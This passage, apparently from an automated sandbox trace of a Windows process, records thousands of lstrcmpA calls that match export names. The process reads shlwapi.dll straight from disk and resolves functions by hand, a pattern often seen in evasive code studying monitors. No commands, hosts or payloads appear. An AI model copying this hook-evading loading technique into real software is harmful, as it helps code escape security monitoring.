(lpString1="NetAccessEnum", lpString2="DsGetDcCloseW") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameA") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameW") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountA") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNameWithAccountW") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextA") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcNextW") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenA") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcOpenW") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageA") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetDcSiteCoverageW") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetForestTrustInformationW") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameA") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsGetSiteNameW") returned 1 [0139.634] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsMergeForestTrustInformationW") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleFreeMemory") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsRoleGetPrimaryDomainInformation") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameA") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="DsValidateSubnetNameW") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugCall") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserDebugTrace") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryEmulatedDomains") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryOtherDomains") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserQueryStatistics") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetNetlogonState") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserResetStatistics") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserServerEnum") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_BrowserSetNetlogonState") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_DsUpdateReadOnlyServerDnsRecords") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountDeltas") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetAccountSync") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetChainSetClientAttributes2") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseDeltas") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseRedo") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDatabaseSync2") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsGetVersion") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetDfsIsThisADomainName") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetDCList") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetGetForestTrustInformation") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonControl2") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonGetDomainInfo") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogoff") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogon") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonEx") returned 1 [0139.635] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSamLogonWithFlags") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonSendToSam") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogoff") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetLogonUasLogon") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate2") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerAuthenticate3") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerGetTrustInfo") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordGet") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerPasswordSet2") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerReqChallenge") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBits") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerSetServiceBitsEx") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetServerTrustPasswordsGet") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeClientDigest") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="I_NetlogonComputeServerDigest") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessAdd") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessDel") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessEnum", lpString2="NetAccessEnum") returned 0 [0139.636] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavAddConnection") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavDeleteConnection") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavFlushFile") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetExtendedError") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetHTTPFromUNCPath") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DavGetUNCFromHTTPPath") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesA") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExA") returned 1 [0139.636] lstrcmpA (lpString1="NetAccessGetInfo", lpString2="DsAddressToSiteNamesExW") returned 1 [0139.682] GetProcessHeap () returned 0x430000 [0139.682] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x2d65030 | out: hHeap=0x430000) returned 1 [0139.682] GetProcessHeap () returned 0x430000 [0139.682] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x4491c0 [0139.683] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x7ffc5e7b0000 [0139.684] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0139.684] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0139.684] GetModuleFileNameA (in: hModule=0x7ffc5e7b0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")) returned 0x1f [0139.684] CreateFileA (lpFileName="C:\\Windows\\system32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0139.684] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0139.684] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0139.684] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=332104) returned 1 [0139.684] GetProcessHeap () returned 0x430000 [0139.684] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x51148) returned 0x2d65030 [0139.685] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0139.685] ReadFile (in: hFile=0x17c, lpBuffer=0x2d65030, nNumberOfBytesToRead=0x51148, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d65030*, lpNumberOfBytesRead=0x14f5a4*=0x51148, lpOverlapped=0x0) returned 1 [0140.017] CloseHandle (hObject=0x17c) returned 1 [0140.017] lstrcmpA (lpString1="AssocCreate", lpString2="AssocCreate") returned 0 [0140.017] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocCreate") returned 1 [0140.017] lstrcmpA (lpString1="AssocGetPerceivedType", lpString2="AssocGetPerceivedType") returned 0 [0140.017] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocCreate") returned 1 [0140.017] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocGetPerceivedType") returned 1 [0140.017] lstrcmpA (lpString1="AssocIsDangerous", lpString2="AssocIsDangerous") returned 0 [0140.017] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocCreate") returned 1 [0140.017] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocGetPerceivedType") returned 1 [0140.017] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocIsDangerous") returned 1 [0140.017] lstrcmpA (lpString1="AssocQueryKeyA", lpString2="AssocQueryKeyA") returned 0 [0140.017] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocCreate") returned 1 [0140.017] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocGetPerceivedType") returned 1 [0140.017] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocIsDangerous") returned 1 [0140.017] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyA") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryKeyW", lpString2="AssocQueryKeyW") returned 0 [0140.018] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocCreate") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocGetPerceivedType") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocIsDangerous") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyA") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryKeyW") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringA", lpString2="AssocQueryStringA") returned 0 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocCreate") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocGetPerceivedType") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocIsDangerous") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyA") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryKeyW") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringA") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyA", lpString2="AssocQueryStringByKeyA") returned 0 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocCreate") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocGetPerceivedType") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocIsDangerous") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyA") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryKeyW") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringA") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyA") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringByKeyW", lpString2="AssocQueryStringByKeyW") returned 0 [0140.018] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocCreate") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0140.018] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0140.019] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0140.019] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0140.019] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0140.019] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0140.019] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0140.019] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0140.019] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0140.019] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0140.019] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0140.019] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0140.019] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0140.019] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0140.020] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0140.020] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0140.020] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0140.020] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0140.020] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0140.020] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0140.020] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0140.020] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0140.020] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0140.020] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0140.020] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0140.020] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0140.020] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0140.020] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0140.020] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0140.020] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0140.020] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0140.020] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0140.020] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0140.020] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0140.020] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0140.020] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0140.020] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0140.020] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0140.020] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0140.020] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0140.020] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0140.020] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0140.021] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0140.021] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0140.021] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0140.021] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0140.021] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0140.021] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0140.021] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0140.021] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0140.021] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0140.021] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0140.021] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0140.021] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0140.021] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0140.021] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0140.021] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0140.021] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0140.022] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0140.022] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0140.022] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0140.022] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0140.022] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0140.022] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0140.022] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0140.022] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0140.022] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0140.022] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0140.022] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0140.022] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0140.022] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0140.022] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0140.023] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0140.023] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0140.023] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0140.023] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0140.023] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0140.023] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0140.023] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0140.023] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0140.023] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0140.023] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0140.023] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0140.023] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0140.023] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0140.023] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0140.023] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0140.023] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0140.024] lstrcmpA (lpString1="GetAcceptLanguagesA", 